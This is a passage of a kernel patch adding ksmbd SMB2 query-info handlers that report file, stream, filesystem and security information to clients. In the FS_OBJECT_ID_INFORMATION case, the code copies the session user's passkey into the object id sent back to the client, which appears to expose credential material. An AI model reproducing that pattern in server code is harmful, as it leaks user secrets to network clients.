++	filename = convert_to_nt_pathname(work->tcon->share_conf, &fp->filp->f_path);
++	if (IS_ERR(filename))
++		return PTR_ERR(filename);
++
++	inode = file_inode(fp->filp);
++	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
++
++	ksmbd_debug(SMB, "filename = %s\n", filename);
++	delete_pending = ksmbd_inode_pending_delete(fp);
++	file_info = (struct smb2_file_all_info *)rsp->Buffer;
++
++	file_info->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(stat.atime);
++	file_info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.mtime);
++	file_info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.ctime);
++	file_info->ChangeTime = cpu_to_le64(time);
++	file_info->Attributes = fp->f_ci->m_fattr;
++	file_info->Pad1 = 0;
++	file_info->AllocationSize =
++		cpu_to_le64(inode->i_blocks << 9);
++	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
++	file_info->NumberOfLinks =
++			cpu_to_le32(get_nlink(&stat) - delete_pending);
++	file_info->DeletePending = delete_pending;
++	file_info->Directory = S_ISDIR(stat.mode) ? 1 : 0;
++	file_info->Pad2 = 0;
++	file_info->IndexNumber = cpu_to_le64(stat.ino);
++	file_info->EASize = 0;
++	file_info->AccessFlags = fp->daccess;
++	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
++	file_info->Mode = fp->coption;
++	file_info->AlignmentRequirement = 0;
++	conv_len = smbConvertToUTF16((__le16 *)file_info->FileName, filename,
++				     PATH_MAX, conn->local_nls, 0);
++	conv_len *= 2;
++	file_info->FileNameLength = cpu_to_le32(conv_len);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_all_info) + conv_len - 1);
++	kfree(filename);
++	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
++	return 0;
++}
++
++static void get_file_alternate_info(struct ksmbd_work *work,
++				    struct smb2_query_info_rsp *rsp,
++				    struct ksmbd_file *fp,
++				    void *rsp_org)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_file_alt_name_info *file_info;
++	struct dentry *dentry = fp->filp->f_path.dentry;
++	int conv_len;
++
++	spin_lock(&dentry->d_lock);
++	file_info = (struct smb2_file_alt_name_info *)rsp->Buffer;
++	conv_len = ksmbd_extract_shortname(conn,
++					   dentry->d_name.name,
++					   file_info->FileName);
++	spin_unlock(&dentry->d_lock);
++	file_info->FileNameLength = cpu_to_le32(conv_len);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_alt_name_info) + conv_len);
++	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
++}
++
++static void get_file_stream_info(struct ksmbd_work *work,
++				 struct smb2_query_info_rsp *rsp,
++				 struct ksmbd_file *fp,
++				 void *rsp_org)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_file_stream_info *file_info;
++	char *stream_name, *xattr_list = NULL, *stream_buf;
++	struct kstat stat;
++	const struct path *path = &fp->filp->f_path;
++	ssize_t xattr_list_len;
++	int nbytes = 0, streamlen, stream_name_len, next, idx = 0;
++	int buf_free_len;
++	struct smb2_query_info_req *req = ksmbd_req_buf_next(work);
++
++	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
++			 &stat);
++	file_info = (struct smb2_file_stream_info *)rsp->Buffer;
++
++	buf_free_len =
++		smb2_calc_max_out_buf_len(work, 8,
++					  le32_to_cpu(req->OutputBufferLength));
++	if (buf_free_len < 0)
++		goto out;
++
++	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
++	if (xattr_list_len < 0) {
++		goto out;
++	} else if (!xattr_list_len) {
++		ksmbd_debug(SMB, "empty xattr in the file\n");
++		goto out;
++	}
++
++	while (idx < xattr_list_len) {
++		stream_name = xattr_list + idx;
++		streamlen = strlen(stream_name);
++		idx += streamlen + 1;
++
++		ksmbd_debug(SMB, "%s, len %d\n", stream_name, streamlen);
++
++		if (strncmp(&stream_name[XATTR_USER_PREFIX_LEN],
++			    STREAM_PREFIX, STREAM_PREFIX_LEN))
++			continue;
++
++		stream_name_len = streamlen - (XATTR_USER_PREFIX_LEN +
++				STREAM_PREFIX_LEN);
++		streamlen = stream_name_len;
++
++		/* plus : size */
++		streamlen += 1;
++		stream_buf = kmalloc(streamlen + 1, GFP_KERNEL);
++		if (!stream_buf)
++			break;
++
++		streamlen = snprintf(stream_buf, streamlen + 1,
++				     ":%s", &stream_name[XATTR_NAME_STREAM_LEN]);
++
++		next = sizeof(struct smb2_file_stream_info) + streamlen * 2;
++		if (next > buf_free_len) {
++			kfree(stream_buf);
++			break;
++		}
++
++		file_info = (struct smb2_file_stream_info *)&rsp->Buffer[nbytes];
++		streamlen  = smbConvertToUTF16((__le16 *)file_info->StreamName,
++					       stream_buf, streamlen,
++					       conn->local_nls, 0);
++		streamlen *= 2;
++		kfree(stream_buf);
++		file_info->StreamNameLength = cpu_to_le32(streamlen);
++		file_info->StreamSize = cpu_to_le64(stream_name_len);
++		file_info->StreamAllocationSize = cpu_to_le64(stream_name_len);
++
++		nbytes += next;
++		buf_free_len -= next;
++		file_info->NextEntryOffset = cpu_to_le32(next);
++	}
++
++out:
++	if (!S_ISDIR(stat.mode) &&
++	    buf_free_len >= sizeof(struct smb2_file_stream_info) + 7 * 2) {
++		file_info = (struct smb2_file_stream_info *)
++			&rsp->Buffer[nbytes];
++		streamlen = smbConvertToUTF16((__le16 *)file_info->StreamName,
++					      "::$DATA", 7, conn->local_nls, 0);
++		streamlen *= 2;
++		file_info->StreamNameLength = cpu_to_le32(streamlen);
++		file_info->StreamSize = cpu_to_le64(stat.size);
++		file_info->StreamAllocationSize = cpu_to_le64(stat.blocks << 9);
++		nbytes += sizeof(struct smb2_file_stream_info) + streamlen;
++	}
++
++	/* last entry offset should be 0 */
++	file_info->NextEntryOffset = 0;
++	kvfree(xattr_list);
++
++	rsp->OutputBufferLength = cpu_to_le32(nbytes);
++	inc_rfc1001_len(rsp_org, nbytes);
++}
++
++static void get_file_internal_info(struct smb2_query_info_rsp *rsp,
++				   struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_internal_info *file_info;
++	struct kstat stat;
++
++	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
++			 &stat);
++	file_info = (struct smb2_file_internal_info *)rsp->Buffer;
++	file_info->IndexNumber = cpu_to_le64(stat.ino);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_internal_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
++}
++
++static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
++				      struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_ntwrk_info *file_info;
++	struct inode *inode;
++	struct kstat stat;
++	u64 time;
++
++	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
++		pr_err("no right to read the attributes : 0x%x\n",
++		       fp->daccess);
++		return -EACCES;
++	}
++
++	file_info = (struct smb2_file_ntwrk_info *)rsp->Buffer;
++
++	inode = file_inode(fp->filp);
++	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
++
++	file_info->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(stat.atime);
++	file_info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.mtime);
++	file_info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.ctime);
++	file_info->ChangeTime = cpu_to_le64(time);
++	file_info->Attributes = fp->f_ci->m_fattr;
++	file_info->AllocationSize =
++		cpu_to_le64(inode->i_blocks << 9);
++	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
++	file_info->Reserved = cpu_to_le32(0);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_ntwrk_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ntwrk_info));
++	return 0;
++}
++
++static void get_file_ea_info(struct smb2_query_info_rsp *rsp, void *rsp_org)
++{
++	struct smb2_file_ea_info *file_info;
++
++	file_info = (struct smb2_file_ea_info *)rsp->Buffer;
++	file_info->EASize = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_ea_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ea_info));
++}
++
++static void get_file_position_info(struct smb2_query_info_rsp *rsp,
++				   struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_pos_info *file_info;
++
++	file_info = (struct smb2_file_pos_info *)rsp->Buffer;
++	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_pos_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_pos_info));
++}
++
++static void get_file_mode_info(struct smb2_query_info_rsp *rsp,
++			       struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_mode_info *file_info;
++
++	file_info = (struct smb2_file_mode_info *)rsp->Buffer;
++	file_info->Mode = fp->coption & FILE_MODE_INFO_MASK;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_mode_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_mode_info));
++}
++
++static void get_file_compression_info(struct smb2_query_info_rsp *rsp,
++				      struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_comp_info *file_info;
++	struct kstat stat;
++
++	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
++			 &stat);
++
++	file_info = (struct smb2_file_comp_info *)rsp->Buffer;
++	file_info->CompressedFileSize = cpu_to_le64(stat.blocks << 9);
++	file_info->CompressionFormat = COMPRESSION_FORMAT_NONE;
++	file_info->CompressionUnitShift = 0;
++	file_info->ChunkShift = 0;
++	file_info->ClusterShift = 0;
++	memset(&file_info->Reserved[0], 0, 3);
++
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_comp_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_comp_info));
++}
++
++static int get_file_attribute_tag_info(struct smb2_query_info_rsp *rsp,
++				       struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb2_file_attr_tag_info *file_info;
++
++	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
++		pr_err("no right to read the attributes : 0x%x\n",
++		       fp->daccess);
++		return -EACCES;
++	}
++
++	file_info = (struct smb2_file_attr_tag_info *)rsp->Buffer;
++	file_info->FileAttributes = fp->f_ci->m_fattr;
++	file_info->ReparseTag = 0;
++	rsp->OutputBufferLength =
++		cpu_to_le32(sizeof(struct smb2_file_attr_tag_info));
++	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_attr_tag_info));
++	return 0;
++}
++
++static int find_file_posix_info(struct smb2_query_info_rsp *rsp,
++				struct ksmbd_file *fp, void *rsp_org)
++{
++	struct smb311_posix_qinfo *file_info;
++	struct inode *inode = file_inode(fp->filp);
++	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
++	vfsuid_t vfsuid = i_uid_into_vfsuid(user_ns, inode);
++	vfsgid_t vfsgid = i_gid_into_vfsgid(user_ns, inode);
++	u64 time;
++	int out_buf_len = sizeof(struct smb311_posix_qinfo) + 32;
++
++	file_info = (struct smb311_posix_qinfo *)rsp->Buffer;
++	file_info->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(inode->i_atime);
++	file_info->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(inode->i_mtime);
++	file_info->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(inode->i_ctime);
++	file_info->ChangeTime = cpu_to_le64(time);
++	file_info->DosAttributes = fp->f_ci->m_fattr;
++	file_info->Inode = cpu_to_le64(inode->i_ino);
++	file_info->EndOfFile = cpu_to_le64(inode->i_size);
++	file_info->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
++	file_info->HardLinks = cpu_to_le32(inode->i_nlink);
++	file_info->Mode = cpu_to_le32(inode->i_mode & 0777);
++	file_info->DeviceId = cpu_to_le32(inode->i_rdev);
++
++	/*
++	 * Sids(32) contain two sids(Domain sid(16), UNIX group sid(16)).
++	 * UNIX sid(16) = revision(1) + num_subauth(1) + authority(6) +
++	 *		  sub_auth(4 * 1(num_subauth)) + RID(4).
++	 */
++	id_to_sid(from_kuid_munged(&init_user_ns, vfsuid_into_kuid(vfsuid)),
++		  SIDUNIX_USER, (struct smb_sid *)&file_info->Sids[0]);
++	id_to_sid(from_kgid_munged(&init_user_ns, vfsgid_into_kgid(vfsgid)),
++		  SIDUNIX_GROUP, (struct smb_sid *)&file_info->Sids[16]);
++
++	rsp->OutputBufferLength = cpu_to_le32(out_buf_len);
++	inc_rfc1001_len(rsp_org, out_buf_len);
++	return out_buf_len;
++}
++
++static int smb2_get_info_file(struct ksmbd_work *work,
++			      struct smb2_query_info_req *req,
++			      struct smb2_query_info_rsp *rsp)
++{
++	struct ksmbd_file *fp;
++	int fileinfoclass = 0;
++	int rc = 0;
++	int file_infoclass_size;
++	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_PIPE)) {
++		/* smb2 info file called for pipe */
++		return smb2_get_info_file_pipe(work->sess, req, rsp,
++					       work->response_buf);
++	}
++
++	if (work->next_smb2_rcv_hdr_off) {
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++				    work->compound_fid);
++			id = work->compound_fid;
++			pid = work->compound_pfid;
++		}
++	}
++
++	if (!has_file_id(id)) {
++		id = req->VolatileFileId;
++		pid = req->PersistentFileId;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, id, pid);
++	if (!fp)
++		return -ENOENT;
++
++	fileinfoclass = req->FileInfoClass;
++
++	switch (fileinfoclass) {
++	case FILE_ACCESS_INFORMATION:
++		get_file_access_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_ACCESS_INFORMATION_SIZE;
++		break;
++
++	case FILE_BASIC_INFORMATION:
++		rc = get_file_basic_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_BASIC_INFORMATION_SIZE;
++		break;
++
++	case FILE_STANDARD_INFORMATION:
++		get_file_standard_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_STANDARD_INFORMATION_SIZE;
++		break;
++
++	case FILE_ALIGNMENT_INFORMATION:
++		get_file_alignment_info(rsp, work->response_buf);
++		file_infoclass_size = FILE_ALIGNMENT_INFORMATION_SIZE;
++		break;
++
++	case FILE_ALL_INFORMATION:
++		rc = get_file_all_info(work, rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_ALL_INFORMATION_SIZE;
++		break;
++
++	case FILE_ALTERNATE_NAME_INFORMATION:
++		get_file_alternate_info(work, rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_ALTERNATE_NAME_INFORMATION_SIZE;
++		break;
++
++	case FILE_STREAM_INFORMATION:
++		get_file_stream_info(work, rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_STREAM_INFORMATION_SIZE;
++		break;
++
++	case FILE_INTERNAL_INFORMATION:
++		get_file_internal_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_INTERNAL_INFORMATION_SIZE;
++		break;
++
++	case FILE_NETWORK_OPEN_INFORMATION:
++		rc = get_file_network_open_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_NETWORK_OPEN_INFORMATION_SIZE;
++		break;
++
++	case FILE_EA_INFORMATION:
++		get_file_ea_info(rsp, work->response_buf);
++		file_infoclass_size = FILE_EA_INFORMATION_SIZE;
++		break;
++
++	case FILE_FULL_EA_INFORMATION:
++		rc = smb2_get_ea(work, fp, req, rsp, work->response_buf);
++		file_infoclass_size = FILE_FULL_EA_INFORMATION_SIZE;
++		break;
++
++	case FILE_POSITION_INFORMATION:
++		get_file_position_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_POSITION_INFORMATION_SIZE;
++		break;
++
++	case FILE_MODE_INFORMATION:
++		get_file_mode_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_MODE_INFORMATION_SIZE;
++		break;
++
++	case FILE_COMPRESSION_INFORMATION:
++		get_file_compression_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_COMPRESSION_INFORMATION_SIZE;
++		break;
++
++	case FILE_ATTRIBUTE_TAG_INFORMATION:
++		rc = get_file_attribute_tag_info(rsp, fp, work->response_buf);
++		file_infoclass_size = FILE_ATTRIBUTE_TAG_INFORMATION_SIZE;
++		break;
++	case SMB_FIND_FILE_POSIX_INFO:
++		if (!work->tcon->posix_extensions) {
++			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
++			rc = -EOPNOTSUPP;
++		} else {
++			file_infoclass_size = find_file_posix_info(rsp, fp,
++					work->response_buf);
++		}
++		break;
++	default:
++		ksmbd_debug(SMB, "fileinfoclass %d not supported yet\n",
++			    fileinfoclass);
++		rc = -EOPNOTSUPP;
++	}
++	if (!rc)
++		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
++				      rsp, work->response_buf,
++				      file_infoclass_size);
++	ksmbd_fd_put(work, fp);
++	return rc;
++}
++
++static int smb2_get_info_filesystem(struct ksmbd_work *work,
++				    struct smb2_query_info_req *req,
++				    struct smb2_query_info_rsp *rsp)
++{
++	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_share_config *share = work->tcon->share_conf;
++	int fsinfoclass = 0;
++	struct kstatfs stfs;
++	struct path path;
++	int rc = 0, len;
++	int fs_infoclass_size = 0;
++
++	if (!share->path)
++		return -EIO;
++
++	rc = kern_path(share->path, LOOKUP_NO_SYMLINKS, &path);
++	if (rc) {
++		pr_err("cannot create vfs path\n");
++		return -EIO;
++	}
++
++	rc = vfs_statfs(&path, &stfs);
++	if (rc) {
++		pr_err("cannot do stat of path %s\n", share->path);
++		path_put(&path);
++		return -EIO;
++	}
++
++	fsinfoclass = req->FileInfoClass;
++
++	switch (fsinfoclass) {
++	case FS_DEVICE_INFORMATION:
++	{
++		struct filesystem_device_info *info;
++
++		info = (struct filesystem_device_info *)rsp->Buffer;
++
++		info->DeviceType = cpu_to_le32(stfs.f_type);
++		info->DeviceCharacteristics = cpu_to_le32(0x00000020);
++		rsp->OutputBufferLength = cpu_to_le32(8);
++		inc_rfc1001_len(work->response_buf, 8);
++		fs_infoclass_size = FS_DEVICE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_ATTRIBUTE_INFORMATION:
++	{
++		struct filesystem_attribute_info *info;
++		size_t sz;
++
++		info = (struct filesystem_attribute_info *)rsp->Buffer;
++		info->Attributes = cpu_to_le32(FILE_SUPPORTS_OBJECT_IDS |
++					       FILE_PERSISTENT_ACLS |
++					       FILE_UNICODE_ON_DISK |
++					       FILE_CASE_PRESERVED_NAMES |
++					       FILE_CASE_SENSITIVE_SEARCH |
++					       FILE_SUPPORTS_BLOCK_REFCOUNTING);
++
++		info->Attributes |= cpu_to_le32(server_conf.share_fake_fscaps);
++
++		if (test_share_config_flag(work->tcon->share_conf,
++		    KSMBD_SHARE_FLAG_STREAMS))
++			info->Attributes |= cpu_to_le32(FILE_NAMED_STREAMS);
++
++		info->MaxPathNameComponentLength = cpu_to_le32(stfs.f_namelen);
++		len = smbConvertToUTF16((__le16 *)info->FileSystemName,
++					"NTFS", PATH_MAX, conn->local_nls, 0);
++		len = len * 2;
++		info->FileSystemNameLen = cpu_to_le32(len);
++		sz = sizeof(struct filesystem_attribute_info) - 2 + len;
++		rsp->OutputBufferLength = cpu_to_le32(sz);
++		inc_rfc1001_len(work->response_buf, sz);
++		fs_infoclass_size = FS_ATTRIBUTE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_VOLUME_INFORMATION:
++	{
++		struct filesystem_vol_info *info;
++		size_t sz;
++		unsigned int serial_crc = 0;
++
++		info = (struct filesystem_vol_info *)(rsp->Buffer);
++		info->VolumeCreationTime = 0;
++		serial_crc = crc32_le(serial_crc, share->name,
++				      strlen(share->name));
++		serial_crc = crc32_le(serial_crc, share->path,
++				      strlen(share->path));
++		serial_crc = crc32_le(serial_crc, ksmbd_netbios_name(),
++				      strlen(ksmbd_netbios_name()));
++		/* Taking dummy value of serial number*/
++		info->SerialNumber = cpu_to_le32(serial_crc);
++		len = smbConvertToUTF16((__le16 *)info->VolumeLabel,
++					share->name, PATH_MAX,
++					conn->local_nls, 0);
++		len = len * 2;
++		info->VolumeLabelSize = cpu_to_le32(len);
++		info->Reserved = 0;
++		sz = sizeof(struct filesystem_vol_info) - 2 + len;
++		rsp->OutputBufferLength = cpu_to_le32(sz);
++		inc_rfc1001_len(work->response_buf, sz);
++		fs_infoclass_size = FS_VOLUME_INFORMATION_SIZE;
++		break;
++	}
++	case FS_SIZE_INFORMATION:
++	{
++		struct filesystem_info *info;
++
++		info = (struct filesystem_info *)(rsp->Buffer);
++		info->TotalAllocationUnits = cpu_to_le64(stfs.f_blocks);
++		info->FreeAllocationUnits = cpu_to_le64(stfs.f_bfree);
++		info->SectorsPerAllocationUnit = cpu_to_le32(1);
++		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
++		rsp->OutputBufferLength = cpu_to_le32(24);
++		inc_rfc1001_len(work->response_buf, 24);
++		fs_infoclass_size = FS_SIZE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_FULL_SIZE_INFORMATION:
++	{
++		struct smb2_fs_full_size_info *info;
++
++		info = (struct smb2_fs_full_size_info *)(rsp->Buffer);
++		info->TotalAllocationUnits = cpu_to_le64(stfs.f_blocks);
++		info->CallerAvailableAllocationUnits =
++					cpu_to_le64(stfs.f_bavail);
++		info->ActualAvailableAllocationUnits =
++					cpu_to_le64(stfs.f_bfree);
++		info->SectorsPerAllocationUnit = cpu_to_le32(1);
++		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
++		rsp->OutputBufferLength = cpu_to_le32(32);
++		inc_rfc1001_len(work->response_buf, 32);
++		fs_infoclass_size = FS_FULL_SIZE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_OBJECT_ID_INFORMATION:
++	{
++		struct object_id_info *info;
++
++		info = (struct object_id_info *)(rsp->Buffer);
++
++		if (!user_guest(sess->user))
++			memcpy(info->objid, user_passkey(sess->user), 16);
++		else
++			memset(info->objid, 0, 16);
++
++		info->extended_info.magic = cpu_to_le32(EXTENDED_INFO_MAGIC);
++		info->extended_info.version = cpu_to_le32(1);
++		info->extended_info.release = cpu_to_le32(1);
++		info->extended_info.rel_date = 0;
++		memcpy(info->extended_info.version_string, "1.1.0", strlen("1.1.0"));
++		rsp->OutputBufferLength = cpu_to_le32(64);
++		inc_rfc1001_len(work->response_buf, 64);
++		fs_infoclass_size = FS_OBJECT_ID_INFORMATION_SIZE;
++		break;
++	}
++	case FS_SECTOR_SIZE_INFORMATION:
++	{
++		struct smb3_fs_ss_info *info;
++		unsigned int sector_size =
++			min_t(unsigned int, path.mnt->mnt_sb->s_blocksize, 4096);
++
++		info = (struct smb3_fs_ss_info *)(rsp->Buffer);
++
++		info->LogicalBytesPerSector = cpu_to_le32(sector_size);
++		info->PhysicalBytesPerSectorForAtomicity =
++				cpu_to_le32(sector_size);
++		info->PhysicalBytesPerSectorForPerf = cpu_to_le32(sector_size);
++		info->FSEffPhysicalBytesPerSectorForAtomicity =
++				cpu_to_le32(sector_size);
++		info->Flags = cpu_to_le32(SSINFO_FLAGS_ALIGNED_DEVICE |
++				    SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE);
++		info->ByteOffsetForSectorAlignment = 0;
++		info->ByteOffsetForPartitionAlignment = 0;
++		rsp->OutputBufferLength = cpu_to_le32(28);
++		inc_rfc1001_len(work->response_buf, 28);
++		fs_infoclass_size = FS_SECTOR_SIZE_INFORMATION_SIZE;
++		break;
++	}
++	case FS_CONTROL_INFORMATION:
++	{
++		/*
++		 * TODO : The current implementation is based on
++		 * test result with win7(NTFS) server. It's need to
++		 * modify this to get valid Quota values
++		 * from Linux kernel
++		 */
++		struct smb2_fs_control_info *info;
++
++		info = (struct smb2_fs_control_info *)(rsp->Buffer);
++		info->FreeSpaceStartFiltering = 0;
++		info->FreeSpaceThreshold = 0;
++		info->FreeSpaceStopFiltering = 0;
++		info->DefaultQuotaThreshold = cpu_to_le64(SMB2_NO_FID);
++		info->DefaultQuotaLimit = cpu_to_le64(SMB2_NO_FID);
++		info->Padding = 0;
++		rsp->OutputBufferLength = cpu_to_le32(48);
++		inc_rfc1001_len(work->response_buf, 48);
++		fs_infoclass_size = FS_CONTROL_INFORMATION_SIZE;
++		break;
++	}
++	case FS_POSIX_INFORMATION:
++	{
++		struct filesystem_posix_info *info;
++
++		if (!work->tcon->posix_extensions) {
++			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
++			rc = -EOPNOTSUPP;
++		} else {
++			info = (struct filesystem_posix_info *)(rsp->Buffer);
++			info->OptimalTransferSize = cpu_to_le32(stfs.f_bsize);
++			info->BlockSize = cpu_to_le32(stfs.f_bsize);
++			info->TotalBlocks = cpu_to_le64(stfs.f_blocks);
++			info->BlocksAvail = cpu_to_le64(stfs.f_bfree);
++			info->UserBlocksAvail = cpu_to_le64(stfs.f_bavail);
++			info->TotalFileNodes = cpu_to_le64(stfs.f_files);
++			info->FreeFileNodes = cpu_to_le64(stfs.f_ffree);
++			rsp->OutputBufferLength = cpu_to_le32(56);
++			inc_rfc1001_len(work->response_buf, 56);
++			fs_infoclass_size = FS_POSIX_INFORMATION_SIZE;
++		}
++		break;
++	}
++	default:
++		path_put(&path);
++		return -EOPNOTSUPP;
++	}
++	rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
++			      rsp, work->response_buf,
++			      fs_infoclass_size);
++	path_put(&path);
++	return rc;
++}
++
++static int smb2_get_info_sec(struct ksmbd_work *work,
++			     struct smb2_query_info_req *req,
++			     struct smb2_query_info_rsp *rsp)
++{
++	struct ksmbd_file *fp;
++	struct user_namespace *user_ns;
++	struct smb_ntsd *pntsd = (struct smb_ntsd *)rsp->Buffer, *ppntsd = NULL;
++	struct smb_fattr fattr = {{0}};
++	struct inode *inode;
++	__u32 secdesclen = 0;
++	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
++	int addition_info = le32_to_cpu(req->AdditionalInformation);
++	int rc = 0, ppntsd_size = 0;
++
++	if (addition_info & ~(OWNER_SECINFO | GROUP_SECINFO | DACL_SECINFO |
++			      PROTECTED_DACL_SECINFO |
++			      UNPROTECTED_DACL_SECINFO)) {
++		ksmbd_debug(SMB, "Unsupported addition info: 0x%x)\n",
++		       addition_info);
++
++		pntsd->revision = cpu_to_le16(1);
++		pntsd->type = cpu_to_le16(SELF_RELATIVE | DACL_PROTECTED);
++		pntsd->osidoffset = 0;
++		pntsd->gsidoffset = 0;
++		pntsd->sacloffset = 0;
++		pntsd->dacloffset = 0;
++
++		secdesclen = sizeof(struct smb_ntsd);
++		rsp->OutputBufferLength = cpu_to_le32(secdesclen);
++		inc_rfc1001_len(work->response_buf, secdesclen);
++
++		return 0;
++	}
++
++	if (work->next_smb2_rcv_hdr_off) {
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++				    work->compound_fid);
++			id = work->compound_fid;
++			pid = work->compound_pfid;
++		}
++	}
++
++	if (!has_file_id(id)) {
++		id = req->VolatileFileId;
++		pid = req->PersistentFileId;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, id, pid);
++	if (!fp)
++		return -ENOENT;
++
++	user_ns = file_mnt_user_ns(fp->filp);
++	inode = file_inode(fp->filp);
++	ksmbd_acls_fattr(&fattr, user_ns, inode);
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_ACL_XATTR))
++		ppntsd_size = ksmbd_vfs_get_sd_xattr(work->conn, user_ns,
++						     fp->filp->f_path.dentry,
++						     &ppntsd);
++
++	/* Check if sd buffer size exceeds response buffer size */
++	if (smb2_resp_buf_len(work, 8) > ppntsd_size)
++		rc = build_sec_desc(user_ns, pntsd, ppntsd, ppntsd_size,
++				    addition_info, &secdesclen, &fattr);
++	posix_acl_release(fattr.cf_acls);
++	posix_acl_release(fattr.cf_dacls);
++	kfree(ppntsd);
++	ksmbd_fd_put(work, fp);
++	if (rc)
++		return rc;
++
++	rsp->OutputBufferLength = cpu_to_le32(secdesclen);
++	inc_rfc1001_len(work->response_buf, secdesclen);
++	return 0;
++}
++
++/**
++ * smb2_query_info() - handler for smb2 query info command
++ * @work:	smb work containing query info request buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_query_info(struct ksmbd_work *work)
++{
++	struct smb2_query_info_req *req;
++	struct smb2_query_info_rsp *rsp;
++	int rc = 0;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	ksmbd_debug(SMB, "GOT query info request\n");
++
++	switch (req->InfoType) {
++	case SMB2_O_INFO_FILE:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
++		rc = smb2_get_info_file(work, req, rsp);
++		break;
++	case SMB2_O_INFO_FILESYSTEM:
++		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILESYSTEM\n");
++		rc = smb2_get_info_filesystem(work, req, rsp);
++		break;
++	case SMB2_O_INFO_SECURITY:
